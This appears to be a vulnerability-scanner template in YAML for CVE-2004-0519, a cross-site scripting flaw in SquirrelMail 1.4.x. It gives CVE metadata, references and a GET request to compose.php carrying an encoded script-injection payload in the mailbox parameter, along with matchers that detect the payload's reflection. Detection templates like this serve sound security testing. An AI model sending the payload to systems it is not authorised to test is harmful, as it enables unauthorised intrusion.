51 lines
2.0 KiB
YAML
51 lines
2.0 KiB
YAML
id: CVE-2004-0519
|
|
|
|
info:
|
|
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
|
|
author: dhiyaneshDk
|
|
severity: medium
|
|
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, phishing attacks, or defacement of the SquirrelMail interface.
|
|
remediation: Upgrade to the latest version.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/24068
|
|
- http://security.gentoo.org/glsa/glsa-200405-16.xml
|
|
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
|
|
- http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000858
|
|
- http://marc.info/?l=bugtraq&m=108334862800260
|
|
classification:
|
|
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
|
cvss-score: 6.8
|
|
cve-id: CVE-2004-0519
|
|
cwe-id: NVD-CWE-Other
|
|
epss-score: 0.02285
|
|
epss-percentile: 0.89406
|
|
cpe: cpe:2.3:a:sgi:propack:3.0:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: sgi
|
|
product: propack
|
|
tags: cve,cve2004,squirrelmail,edb,xss,sgi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4b0a004830460221009dd2f6f1f47f6884512787786f2340268b3b43d1f115d5b41a670c3f29f42c4d022100dd3b55ba93d169763824f63a0016a520e29f80044dd7087a2d1122f4b3617c19:922c64590222798bb761d5b6d8e72950 |